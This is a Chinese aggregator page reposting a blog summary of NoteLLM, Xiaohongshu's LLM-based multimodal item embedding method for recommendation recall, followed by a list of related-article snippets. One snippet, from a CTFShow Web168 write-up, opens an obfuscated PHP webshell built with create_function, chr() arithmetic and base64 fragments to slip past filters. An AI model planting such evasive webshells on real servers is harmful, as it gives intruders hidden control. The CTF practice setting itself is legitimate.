LLM4Rec:小红书NoteLLM

news/2025/2/23 10:28:07/文章来源:https://www.cnblogs.com/xumaomao/p/18715440

背景

为了解决推荐中的物品冷启动问题,在召回阶段中往往会增加一路使用内容多模态表征的i2i召回,这路召回由于只使用了纯内容的特征,和老物品便可以公平比较,不会产生因为新物品后验行为少而导致无法被召回的问题。在现有的多模态i2i召回方法在文本侧一般都是用一个BERT经过预训练后生成embedding然后基于embedding的相似度来进行召回,但是这样可能也会存在一些问题:

1. BERT表征能力不足。相较于BERT,可以选用参数量更大的LLM模型来生成embedding

2. 直接用BERT/LLM模型生成embedding只表达了比较广泛的文本语义信息,和下游推荐系统的任务目标不一致

因此论文选用了LLaMA2作为backbone,并且使用了推荐系统中的协同过滤信号来微调,得到了符合该推荐场景需求的多模态item embedding表示

 

方法介绍

论文方法主要包含3个部分:

1. 笔记压缩prompt:如何构建prompt得到笔记的压缩表示、标签、类别

2. 生成式对比学习(GCL):利用协同信息微调模型

3. 协同监督微调(CSFT):利用标签和类别信息微调模型

 

笔记压缩prompt

用于生成note的压缩表示、标签、类别的prompt模版如下所示:

其中, [BOS], [EMB]和[EOS]为特殊token, 而<Instruction>, <Input Note>, <Output Guidance>和<Output>为占位符, 对于不同的任务会使用不同特定的内容来替换。

类别生成任务的模版如下所示:

标签生成任务的模版如下所示:

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/883734.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

正点原子ESP32S3系列开发板全面支持小智AI

正点原子ESP32S3系列开发板全面支持小智AI 一、什么是小智AI? 小智AI项目是由虾哥发起并开源的一个项目。该项目能帮助更多人入门AI硬件开发,了解如何将当下飞速发展的大语言模型应用到实际的硬件设备中。 小智AI功能如下:WiFi / ML307 Cat.1 4G BOOT键唤醒和打断,支持点击…

52pj2025春节红包解题-安卓中级

先找到判断方法,显然是一个nativeida加载so,导出表中没有这个函数,所以是动态注册的,找到jni_onload找到函数地址修改3个参数的类型,便于分析总得来看,最终要执行的不是a就是ao了 bool __fastcall sub_BE440(JNIEnv *env, jobject object, jstring inputKey) {int v5; //…

留言版

<link rel="stylesheet" href="https://blog-static.cnblogs.com/files/elkyo/OwO.min.css" /><script src="https://blog-static.cnblogs.com/files/elkyo/OwO.min.js"></script><script>/*文章评论*/var le = $("…

ToDesk远程打印详细设置步骤教学

很多小伙伴常有打印、远程打印的需求,特别是对于电商人、跨境电商、教师、产品经理、实验人员等群体来说掌握这项技能可谓是能够在很多场景下带来便捷,大幅提升做事效率!那么是否有方法可以随时随地实现这样需求呐? 答案是肯定的,通过ToDesk远程控制软件即可轻松设置成功~…

SaaS 已死:微软 CEO 如何看待商业软件的未来

(作者使用 Canva AI Image Generator 生成的图片)Brad Gerstner 和 Bill Gurley 在他们的播客 BG2 Pod 中采访了微软 CEO Satya Nadella。Nadella 声称 SaaS 时代已经结束,未来将由 AI 作为主导力量的集成平台引领。 几十年来,SaaS 应用一直驱动着商业运营——从客户关系管理…

011 Axios网络请求封装

在日常应用过程中,一个项目中的网络请求会很多,此时一般采取的方案是将网络请求封装起来在src目录下创建文件夹utils,并创建文件request,用来存储网络请求对象axios 所有安装包都在这个package.json里面可以查看。 在src文件中创建utils文件夹(网络请求的方法),在utils文…

CTFShow-Web168:免杀脚本

CTFShow-Web168:免杀脚本 对eval,system还有$_POST和$_GET进行过滤,$_REQUEST还可以用 🛠️ Web167 WriteUp 提供一个免杀脚本: <?php $bFIY=create_function(chr(25380/705).chr(92115/801).base64_decode(bw==).base64_decode(bQ==).base64_decode(ZQ==),chr(0x16964…

搭建gitlab runner

1、搭建runner 镜像:gitlab/gitlab-runner:latest 2、注册runner,输入gitlab-runner register命令 root@runner-6f49c57c49-5889v:/# gitlab-runner register Runtime platform arch=amd64 os=linux pid=1054 revision=81ab07f6 version=1…

前端开发过程小知识点记录(开发过程实时更新)

1.#main div 距离页面顶部和左边有间距,但是并没有人为设置 出现现象图: 原因:大多数浏览器会为 body 和 html 元素添加默认的外边距。可以通过重置这些样式来解决此问题。 解决办法:在css中清除浏览器的默认样式 html, body { margin: 0; /* 清除默认外边距 */ padding: 0…

Idea自动生成注释

原文链接 使用IDEA配置自动生成注释。 1 创建类时自动加注释 点击左上角菜单栏的 file -> Setting -> Editor -> File and Code Templates -> Includes -> File Header输入如下内容: /***@Author: 代码的路*@Date: ${DATE} ${TIME}*@Param: *@Return: *@Descri…

JavaIO流(三)

6.转换流 不同编码读取出现乱码的问题:如果代码编码和被读取的文本文件编码是一致的,使用字符流读取文本时不会出现乱码 如果代码编码和被读取的文本文件编码是不一致的,使用字符流读取文本时就会出现乱码InputStreamReader(字符输入转换流) 是Reader抽象类下的实现类解决…

pycharm上传github问题:rejected

我从pycharm上传项目时,遇到的问题:以下是一些解决思路: 这个错误提示表明,你在尝试将本地代码推送到远程仓库时,远程仓库中已经包含了你本地尚未获取的更改。换句话说,远程仓库的代码比你的本地代码更新。Git 为了防止冲突,拒绝了你的推送操作。 错误原因 这种情况通常…